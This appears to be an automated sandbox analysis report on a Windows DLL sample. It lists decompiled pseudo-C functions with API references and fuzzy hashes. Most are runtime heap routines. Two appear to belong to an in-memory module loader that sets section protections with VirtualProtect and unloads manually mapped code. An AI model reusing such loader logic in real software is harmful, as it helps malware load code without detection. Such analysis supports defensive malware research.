                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4100373531-0
                                                                                                                                                                    • Opcode ID: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                                    • Instruction ID: ee799e3b8b260964baacb2eb61f61a8d535858b77694984a1748e2a29b669165
                                                                                                                                                                    • Opcode Fuzzy Hash: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                                    • Instruction Fuzzy Hash: ED81A3B4A00209DFDB04CF94D881AAEB7F1FF89355F248158E819AB351D735EA82CF90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                                                    			E1000C9E0(intOrPtr* __eax, void* __edx, void* __edi) {
                                                                                                                                                                    				intOrPtr* _t14;
                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                    				intOrPtr* _t38;
                                                                                                                                                                    
                                                                                                                                                                    				 *__eax =  *__eax + __edx;
                                                                                                                                                                    				 *0xba =  *0xba + __edx;
                                                                                                                                                                    				asm("rol dh, 0x0");
                                                                                                                                                                    				asm("adc [edx+edi*4], ah");
                                                                                                                                                                    				 *0xba =  *0xba + __edx;
                                                                                                                                                                    				 *0x00000178 =  *((intOrPtr*)(0x178)) + __edx;
                                                                                                                                                                    				asm("adc dl, al");
                                                                                                                                                                    				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
                                                                                                                                                                    				 *((intOrPtr*)(0x178)) =  *((intOrPtr*)(0x178)) + __edx;
                                                                                                                                                                    				_t14 = _t38;
                                                                                                                                                                    				 *_t14 =  *_t14 + __edx;
                                                                                                                                                                    				 *_t14 =  *_t14 + __edx;
                                                                                                                                                                    				_push(es);
                                                                                                                                                                    				 *_t14 =  *_t14 + __edx;
                                                                                                                                                                    				asm("repne rol byte [eax], 0x10");
                                                                                                                                                                    				asm("adc eax, ebp");
                                                                                                                                                                    				 *_t14 =  *_t14 + __edx;
                                                                                                                                                                    				asm("adc [ebx-0x40], ah");
                                                                                                                                                                    				 *_t14 =  *_t14 + __edx;
                                                                                                                                                                    				asm("adc [edx+0xc], ch");
                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                    				_push(0x103301c0);
                                                                                                                                                                    				_t15 = E10010534(__eax, __edi, 0xffffffffc29f1178);
                                                                                                                                                                    				_t36 =  *0x00000180;
                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                    					if( *0x10335f3c != 3) {
                                                                                                                                                                    						_push(_t36);
                                                                                                                                                                    						goto L8;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						L1000FA03(4);
                                                                                                                                                                    						 *0x00000174 =  *0x00000174 & 0x00000000;
                                                                                                                                                                    						_t20 = E1000FA7C(_t36);
                                                                                                                                                                    						 *0x0000015C = _t20;
                                                                                                                                                                    						if(_t20 != 0) {
                                                                                                                                                                    							_push(_t36);
                                                                                                                                                                    							_push(_t20);
                                                                                                                                                                    							E1000FAA7();
                                                                                                                                                                    						}
                                                                                                                                                                    						 *0x00000174 = 0xfffffffe;
                                                                                                                                                                    						_t15 = E1000CA86();
                                                                                                                                                                    						if( *((intOrPtr*)(0x15c)) == 0) {
                                                                                                                                                                    							_push( *((intOrPtr*)(0x180)));
                                                                                                                                                                    							L8:
                                                                                                                                                                    							_push(0);
                                                                                                                                                                    							_t15 = RtlFreeHeap( *0x10333310); // executed
                                                                                                                                                                    							_t47 = _t15;
                                                                                                                                                                    							if(_t15 == 0) {
                                                                                                                                                                    								_t17 = E1000F720(_t47);
                                                                                                                                                                    								 *_t17 = E1000F6E5(GetLastError());
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return E10010579(_t15);
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2661975262-0
                                                                                                                                                                    • Opcode ID: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
                                                                                                                                                                    • Instruction ID: f3614e2ed5c3b7a2523f888baaf654e085a5ac9fd5a4e10f0babc6e667b4755f
                                                                                                                                                                    • Opcode Fuzzy Hash: c35be7ddd376820428f790f1a01076792734619c7c1b30ac8a6f5b23f6ddbc2b
                                                                                                                                                                    • Instruction Fuzzy Hash: D921F17AA0E3C55FEB02CB705C957597F609F07295F0A009AE0849B1E7DB689C448BA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 27%
                                                                                                                                                                    			E1000CA30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                    				intOrPtr* _t10;
                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                    				void* _t25;
                                                                                                                                                                    
                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                    				_push(0x103301c0);
                                                                                                                                                                    				_t8 = E10010534(__ebx, __edi, __esi);
                                                                                                                                                                    				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                    					L9:
                                                                                                                                                                    					return E10010579(_t8);
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *0x10335f3c != 3) {
                                                                                                                                                                    					_push(_t23);
                                                                                                                                                                    					L7:
                                                                                                                                                                    					_push(0);
                                                                                                                                                                    					_t8 = RtlFreeHeap( *0x10333310); // executed
                                                                                                                                                                    					_t31 = _t8;
                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                    						_t10 = E1000F720(_t31);
                                                                                                                                                                    						 *_t10 = E1000F6E5(GetLastError());
                                                                                                                                                                    					}
                                                                                                                                                                    					goto L9;
                                                                                                                                                                    				}
                                                                                                                                                                    				L1000FA03(4);
                                                                                                                                                                    				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                                                                                                    				_t13 = E1000FA7C(_t23);
                                                                                                                                                                    				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                    					_push(_t23);
                                                                                                                                                                    					_push(_t13);
                                                                                                                                                                    					E1000FAA7();
                                                                                                                                                                    				}
                                                                                                                                                                    				 *(_t25 - 4) = 0xfffffffe;
                                                                                                                                                                    				_t8 = E1000CA86();
                                                                                                                                                                    				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                                                                                                    					goto L9;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                                                                                                    					goto L7;
                                                                                                                                                                    				}
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2661975262-0
                                                                                                                                                                    • Opcode ID: d759168b4be4b4469117ee5877101e11671dc200a8624a95c389703c63f9e0ca
                                                                                                                                                                    • Instruction ID: 10b30a0b1b21ab9b25203a3b4f1cd3614836a259c78c12a13bfb3de2cf880016
                                                                                                                                                                    • Opcode Fuzzy Hash: d759168b4be4b4469117ee5877101e11671dc200a8624a95c389703c63f9e0ca
                                                                                                                                                                    • Instruction Fuzzy Hash: 94016775B0131A9AFB10DBB49C46B5E76A4DF013E5F104109F5049A0D5CF38A940DF56
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                                    			E1000CE64(void* __edx) {
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				intOrPtr _t1;
                                                                                                                                                                    				void* _t2;
                                                                                                                                                                    				void* _t6;
                                                                                                                                                                    				void* _t10;
                                                                                                                                                                    				void* _t12;
                                                                                                                                                                    				void* _t18;
                                                                                                                                                                    				void* _t20;
                                                                                                                                                                    				void* _t22;
                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                    				void* _t28;
                                                                                                                                                                    				void* _t30;
                                                                                                                                                                    				void* _t32;
                                                                                                                                                                    
                                                                                                                                                                    				_t18 = __edx;
                                                                                                                                                                    				_t12 = HeapAlloc;
                                                                                                                                                                    				do {
                                                                                                                                                                    					_t32 =  *0x10333310; // 0xbb0000
                                                                                                                                                                    					_t20 = _t30;
                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                    						E100119E6(_t12, _t18, _t20, _t32);
                                                                                                                                                                    						E10011846(0x1e);
                                                                                                                                                                    						E100115A8(0xff);
                                                                                                                                                                    					}
                                                                                                                                                                    					_t1 =  *0x10335f3c; // 0x1
                                                                                                                                                                    					if(_t1 != 1) {
                                                                                                                                                                    						__eflags = _t1 - 3;
                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                    							L10:
                                                                                                                                                                    							__eflags = _t30;
                                                                                                                                                                    							if(_t30 == 0) {
                                                                                                                                                                    								_t20 = 1;
                                                                                                                                                                    								__eflags = 1;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t22 = _t20 + 0x0000000f & 0xfffffff0;
                                                                                                                                                                    							__eflags = _t22;
                                                                                                                                                                    							_push(_t22);
                                                                                                                                                                    							goto L13;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_push(_t30);
                                                                                                                                                                    							_t2 = E1000CE07(_t12, _t20, 0, __eflags);
                                                                                                                                                                    							__eflags = _t2;
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								goto L10;
                                                                                                                                                                    							}
                                                                                                                                                                    						}
                                                                                                                                                                    					} else {
                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                    							_t10 = 1;
                                                                                                                                                                    							__eflags = 1;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_t10 = _t30;
                                                                                                                                                                    						}
                                                                                                                                                                    						_push(_t10);
                                                                                                                                                                    						L13:
                                                                                                                                                                    						_push(0);
                                                                                                                                                                    						_t2 = RtlAllocateHeap( *0x10333310); // executed
                                                                                                                                                                    					}
                                                                                                                                                                    					_t28 = _t2;
                                                                                                                                                                    					if(_t28 == 0) {
                                                                                                                                                                    						_t24 = 0xc;
                                                                                                                                                                    						if( *0x103337d4 == _t2) {
                                                                                                                                                                    							 *((intOrPtr*)(E1000F720(__eflags))) = _t24;
                                                                                                                                                                    							L19:
                                                                                                                                                                    							 *((intOrPtr*)(E1000F720(_t37))) = _t24;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							goto L16;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					return _t28;
                                                                                                                                                                    					L16:
                                                                                                                                                                    					_t6 = E100108CA(_t30);
                                                                                                                                                                    					_t37 = _t6;
                                                                                                                                                                    				} while (_t6 != 0);
                                                                                                                                                                    				goto L19;
                                                                                                                                                                    			}



















                                                                                                                                                                    APIs
                                                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 1000CE79
                                                                                                                                                                      • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A0D
                                                                                                                                                                      • Part of subcall function 100119E6: __NMSG_WRITE.LIBCMT ref: 10011A17
                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 1000CE80
                                                                                                                                                                      • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118B2
                                                                                                                                                                      • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 100118C3
                                                                                                                                                                      • Part of subcall function 10011846: GetModuleFileNameA.KERNEL32(00000000,103334D9,00000104,?,103332E0,00000000), ref: 100118DF
                                                                                                                                                                      • Part of subcall function 10011846: _strcpy_s.LIBCMT ref: 100118F4
                                                                                                                                                                      • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 10011907
                                                                                                                                                                      • Part of subcall function 10011846: _strlen.LIBCMT ref: 10011910
                                                                                                                                                                      • Part of subcall function 10011846: _strlen.LIBCMT ref: 1001191D
                                                                                                                                                                      • Part of subcall function 10011846: __invoke_watson.LIBCMT ref: 1001194A
                                                                                                                                                                      • Part of subcall function 100115A8: ___crtCorExitProcess.LIBCMT ref: 100115AC
                                                                                                                                                                      • Part of subcall function 100115A8: ExitProcess.KERNEL32 ref: 100115B6
                                                                                                                                                                      • Part of subcall function 1000CE07: ___sbh_alloc_block.LIBCMT ref: 1000CE2F
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 1000CECE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3791426274-0
                                                                                                                                                                    • Opcode ID: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                                    • Instruction ID: 6f1a83c6d6f502121b77b2a43b6d62c081e19aaa5c93b61cf19e771af3aa1e29
                                                                                                                                                                    • Opcode Fuzzy Hash: ac007278a4e0de9d752827624b5274de92f56d31190f61e6d2d2646ba59319ec
                                                                                                                                                                    • Instruction Fuzzy Hash: 5401F936B493EE9AF221D765DCC1D6E72CDDBC16F0F220126F948CA59ACB60DC8142E1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                    			E1001B1C0(intOrPtr* _a4, void** _a8) {
                                                                                                                                                                    				long _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                    				int _t67;
                                                                                                                                                                    
                                                                                                                                                                    				if(_a8[2] != 0) {
                                                                                                                                                                    					_t4 =  &(_a8[3]); // 0x1
                                                                                                                                                                    					if(( *_t4 & 0x02000000) == 0) {
                                                                                                                                                                    						_t31 =  &(_a8[3]); // 0x1
                                                                                                                                                                    						asm("sbb edx, edx");
                                                                                                                                                                    						_v16 =  ~( ~( *_t31 & 0x20000000));
                                                                                                                                                                    						_t34 =  &(_a8[3]); // 0x1
                                                                                                                                                                    						asm("sbb ecx, ecx");
                                                                                                                                                                    						_v24 =  ~( ~( *_t34 & 0x40000000));
                                                                                                                                                                    						_t37 =  &(_a8[3]); // 0x1
                                                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                                                    						_v12 =  ~( ~( *_t37 & 0x80000000));
                                                                                                                                                                    						_t42 = _v24 * 8; // 0x2034e6cd
                                                                                                                                                                    						_v20 =  *((intOrPtr*)((_v16 << 4) + _t42 + 0x103330c4 + _v12 * 4));
                                                                                                                                                                    						_t49 =  &(_a8[3]); // 0x1
                                                                                                                                                                    						if(( *_t49 & 0x04000000) != 0) {
                                                                                                                                                                    							_v20 = _v20 | 0x00000200;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t55 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                                    						_t67 = VirtualProtect( *_a8,  *_t55, _v20,  &_v8); // executed
                                                                                                                                                                    						if(_t67 != 0) {
                                                                                                                                                                    							return 1;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_push("Error protecting memory page");
                                                                                                                                                                    							E1001AE60(_t67);
                                                                                                                                                                    							return 0;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    					_t7 =  &(_a8[1]); // 0x330475c0
                                                                                                                                                                    					if( *_a8 !=  *_t7) {
                                                                                                                                                                    						L8:
                                                                                                                                                                    						return 1;
                                                                                                                                                                    					}
                                                                                                                                                                    					if(_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
                                                                                                                                                                    						L7:
                                                                                                                                                                    						_t26 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                                    						 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))( *_a8,  *_t26, 0x4000,  *((intOrPtr*)(_a4 + 0x34))); // executed
                                                                                                                                                                    						goto L8;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t16 =  &(_a8[2]); // 0xb805ebc0
                                                                                                                                                                    						if( *_t16 %  *(_a4 + 0x3c) != 0) {
                                                                                                                                                                    							goto L8;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L7;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}










                                                                                                                                                                    Strings
                                                                                                                                                                    • Error protecting memory page, xrefs: 1001B2DD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Error protecting memory page
                                                                                                                                                                    • API String ID: 0-1748499907
                                                                                                                                                                    • Opcode ID: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
                                                                                                                                                                    • Instruction ID: 8d650c0da19698877930e2c5171e1c21c57976ae84b1b649a9511697b3bf2f19
                                                                                                                                                                    • Opcode Fuzzy Hash: fa3f9b01b46355d1ec19b93347b7561b613cc618b83ed61fa7cf9da906a09f9b
                                                                                                                                                                    • Instruction Fuzzy Hash: EB41D774A005099FD748DF58C490BA9B3B2FB88310F14C259EC1A8F355C731EE85CB80
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E1000F7BF(intOrPtr _a4) {
                                                                                                                                                                    				void* _t6;
                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                    				void* _t10;
                                                                                                                                                                    
                                                                                                                                                                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                    				 *0x10333310 = _t6;
                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                    					_t7 = E1000F764(__eflags);
                                                                                                                                                                    					__eflags = _t7 - 3;
                                                                                                                                                                    					 *0x10335f3c = _t7;
                                                                                                                                                                    					if(_t7 != 3) {
                                                                                                                                                                    						L5:
                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                    						return 1;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_t10 = E1000FA34(0x3f8);
                                                                                                                                                                    						__eflags = _t10;
                                                                                                                                                                    						if(_t10 != 0) {
                                                                                                                                                                    							goto L5;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							HeapDestroy( *0x10333310);
                                                                                                                                                                    							 *0x10333310 =  *0x10333310 & 0x00000000;
                                                                                                                                                                    							goto L1;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					L1:
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
                                                                                                                                                                    • HeapDestroy.KERNEL32 ref: 1000F806
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3296620671-0
                                                                                                                                                                    • Opcode ID: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                                    • Instruction ID: 42b5b4e525c6d5e648315bcb041ba63a368b68b04be7829f407a1d363953a1d4
                                                                                                                                                                    • Opcode Fuzzy Hash: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                                    • Instruction Fuzzy Hash: 6FE06D74A14352AAF700EB318C897A936ECFB807D6F20C83DF408C84AAFF648501AA01
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                    			E1001A960(void* _a4) {
                                                                                                                                                                    				void* _v8;
                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				void* _t49;
                                                                                                                                                                    				void* _t52;
                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                    				void* _t68;
                                                                                                                                                                    				void* _t70;
                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                    				void* _t94;
                                                                                                                                                                    				void* _t95;
                                                                                                                                                                    				void* _t96;
                                                                                                                                                                    				void* _t97;
                                                                                                                                                                    
                                                                                                                                                                    				_t49 = _a4;
                                                                                                                                                                    				_v8 = _t49;
                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                    					__eflags =  *(_v8 + 0x10);
                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                    						_t9 =  *_v8 + 0x28; // 0x1ab2068
                                                                                                                                                                    						_t93 =  *((intOrPtr*)(_v8 + 4)) +  *_t9;
                                                                                                                                                                    						__eflags = _t93;
                                                                                                                                                                    						_v12 = _t93;
                                                                                                                                                                    						_v12( *((intOrPtr*)(_v8 + 4)), 0, 0);
                                                                                                                                                                    					}
                                                                                                                                                                    					_push( *((intOrPtr*)(_v8 + 0x30)));
                                                                                                                                                                    					E1000CA30(_t68, _t94, _t95, __eflags);
                                                                                                                                                                    					_t97 = _t96 + 4;
                                                                                                                                                                    					_t70 = _v8;
                                                                                                                                                                    					__eflags =  *(_t70 + 8);
                                                                                                                                                                    					if( *(_t70 + 8) == 0) {
                                                                                                                                                                    						L12:
                                                                                                                                                                    						_t52 = _v8;
                                                                                                                                                                    						__eflags =  *(_t52 + 4);
                                                                                                                                                                    						if( *(_t52 + 4) != 0) {
                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x20))))( *((intOrPtr*)(_v8 + 4)), 0, 0x8000,  *((intOrPtr*)(_v8 + 0x34))); // executed
                                                                                                                                                                    						}
                                                                                                                                                                    						return HeapFree(GetProcessHeap(), 0, _v8);
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                    						while(1) {
                                                                                                                                                                    							__eflags = _v16 -  *((intOrPtr*)(_v8 + 0xc));
                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                    								break;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t60 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                    							_t76 = _v16;
                                                                                                                                                                    							__eflags =  *(_t60 + _t76 * 4);
                                                                                                                                                                    							if( *(_t60 + _t76 * 4) != 0) {
                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))))( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _v16 * 4)),  *((intOrPtr*)(_v8 + 0x34))); // executed
                                                                                                                                                                    								_t97 = _t97 + 8;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t87 = _v16 + 1;
                                                                                                                                                                    							__eflags = _t87;
                                                                                                                                                                    							_v16 = _t87;
                                                                                                                                                                    						}
                                                                                                                                                                    						_push( *((intOrPtr*)(_v8 + 8)));
                                                                                                                                                                    						E1000CA30(_t68, _t94, _t95, __eflags);
                                                                                                                                                                    						_t97 = _t97 + 4;
                                                                                                                                                                    						goto L12;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t49;
                                                                                                                                                                    			}



















                                                                                                                                                                    0x1001a9c3
                                                                                                                                                                    0x1001a9c3
                                                                                                                                                                    0x1001a9c6
                                                                                                                                                                    0x1001a9c6
                                                                                                                                                                    0x1001aa0a
                                                                                                                                                                    0x1001aa0b
                                                                                                                                                                    0x1001aa10
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x1001aa10
                                                                                                                                                                    0x1001a9b5
                                                                                                                                                                    0x00000000

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,1001BA3C), ref: 1001AA42
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,1001BA3C), ref: 1001AA49
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                    Uniqueness

